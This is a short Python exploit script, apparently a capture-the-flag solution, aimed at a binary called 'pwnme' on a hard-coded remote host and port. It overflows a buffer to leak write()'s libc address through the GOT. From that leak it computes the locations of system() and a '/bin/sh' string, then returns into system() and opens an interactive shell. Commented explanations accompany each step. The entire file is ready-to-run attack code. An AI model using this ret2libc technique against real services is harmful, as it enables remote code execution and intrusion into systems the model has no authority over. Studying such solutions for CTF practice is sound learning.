#!/usr/bin/env python
# encoding:utf-8

from utils import *

# Connection to the challenge service.  The two commented-out lines are the
# local alternatives (a plain process, or a debugger session with a breakpoint
# on write()); exactly one `io` assignment should be active.
io = remote('202.120.7.145', 9991)
# io = process('./pwnme')
# io = debug('./pwnme'); io.b('write'); io.r()

# Number of filler bytes sent before the saved return address is reached.
# This value is specific to the 'pwnme' binary; re-derive it if the binary
# is rebuilt.
LEN_TO_RET = 20

# Target binary (source of PLT/GOT addresses) and the libc build the remote
# service uses (source of symbol offsets).  Because PLT/GOT addresses are
# used as fixed constants below, this presumably relies on a non-PIE binary
# -- confirm with checksec.  Every libc offset is only valid for this exact
# libc-2.19.so file.
elf = ELF('pwnme')
libc = ELF('libc-2.19.so')

# Drain any banner/prompt the service prints before it reads input.
io.recvrepeat(0.5)
# Stage 1: return into write@plt with the frame
#   [write@plt][return -> elf.entry][fd=1][buf=got['write']][len=4]
# so the program writes the 4-byte GOT entry of write() to stdout, then
# continues at the entry point (the second payload below depends on the
# program running again).
payload = nops(LEN_TO_RET)
payload += p32(elf.plt['write']) + p32(elf.entry) + p32(1) + p32(elf.got['write']) + p32(4)
io.send(payload)

# The leaked GOT entry is the runtime address of libc's write().  Subtracting
# the symbol's offset within the libc file yields the libc load base, from
# which system() is located.
# NOTE(review): io.recv(4) may return fewer than 4 bytes on a short read, in
# which case u32() raises; io.recvn(4) blocks until all 4 bytes arrive.
write_addr = u32(io.recv(4))
libc_base = write_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
# Hard-coded libc offset; per the variable name presumably a "/bin/sh"
# string inside libc-2.19.so.  It is not looked up (e.g. via libc.search),
# so it must be re-checked whenever the libc file changes.
binsh_addr = libc_base + 0x00160A24
log.info('write addr: 0x%08x' % write_addr)
log.info('system addr: 0x%08x' % system_addr)

# Stage 2 (second run of the program): return into system() with
# binsh_addr as its single argument; elf.entry serves as the fake return
# address after system() returns.
payload = nops(LEN_TO_RET)
payload += p32(system_addr) + p32(elf.entry) + p32(binsh_addr)
io.send(payload)

# Hand the connection over to the user.
io.interactive()
